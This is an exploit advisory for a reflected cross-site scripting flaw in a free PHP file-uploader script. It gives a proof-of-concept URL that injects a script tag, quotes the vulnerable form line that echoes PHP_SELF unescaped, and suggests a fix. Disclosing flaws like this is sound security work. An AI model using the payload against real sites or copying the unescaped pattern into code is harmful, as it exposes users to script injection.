[+] Exploit Title ; Shadow-Fox PhP Uploader Script Cross Site Scripting Vulnerability
[+] Date : 2019-04-18
[+] Author : 0P3N3R FROM IRANIAN ETHICAL HACKERS
[+] Vendor Homepage : https://gist.github.com/shadow-fox/4017681
[+] Version : ...
[+] Dork : N/A
[+] My Site : ...
[+] Tested On : windows 10 - kali linux 2.0
[+] Contact : aliopener22@gmail.com
[+] Description :
[!] Free File Upload Script Based On PhP.
[+] Poc :
[!] http://localhost/uploader.php/"><script>alert(1)</script>
[+] Security Level :
[!] Med
[+] Exploitation Technique:
[!] Remote
[+] Request Method :
[!] POST
[+] Vulnerability Link :
[*] http://localhost/uploader.php
[+] Vulnerable File (s) :
[!] uploader.php
[+] Vulnerable Source Codes :
[!] <form action="<?php echo $_SERVER["PHP_SELF"]; ?>" method="post" enctype="multipart/form-data">
[+] Fix :
[!] Restrict user input or replace bad characters
[+] We Are : [+] 0P3N3R [+]